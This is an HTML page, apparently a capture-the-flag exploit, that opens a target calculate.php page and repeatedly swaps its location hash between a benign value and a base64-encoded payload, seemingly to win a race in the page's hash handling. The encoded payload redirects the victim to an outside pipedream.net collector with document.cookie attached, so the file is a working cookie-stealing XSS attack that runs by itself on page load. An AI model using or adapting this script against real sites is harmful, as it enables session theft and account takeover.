<!DOCTYPE html>
<html>
<head>
  <title>Modify Location Hash</title>
  <script>

    function sleep(ms) {
        return new Promise((r) => setTimeout(r, ms));                
    }

    host = "localhost"
    //host = "15.165.237.22"
    //host = "pwn20"

    async function benign(win){
        win.location = "http://"+host+"/api/calculate.php#mSsx";
    }

    async function evil(win){
        win.location = "http://"+host+"/api/calculate.php#ZG9jdW1lbnQubG9jYXRpb249Imh0dHBzOi8vZW81a3A1Mzhveng5b2xyLm0ucGlwZWRyZWFtLm5ldC8/YT0iK2RvY3VtZW50LmNvb2tpZQ==";
    }

    async function modifyLocationHash() {
      for(let j=0;j<10000;j++){
      // Open the website
      var url = "http://"+host+"/api/calculate.php"
      var win = window.open(url);
      await sleep(1000);

      // Modify the location.hash

      for (let i = 0; i < 10000; i++) {
        benign(win);
        await sleep(2);
        evil(win);
        await sleep(2);
      }
        }
    }
    
  </script>
</head>
<body onload="modifyLocationHash()">
  <h1>Modify Location Hash Example</h1>
</body>
</html>
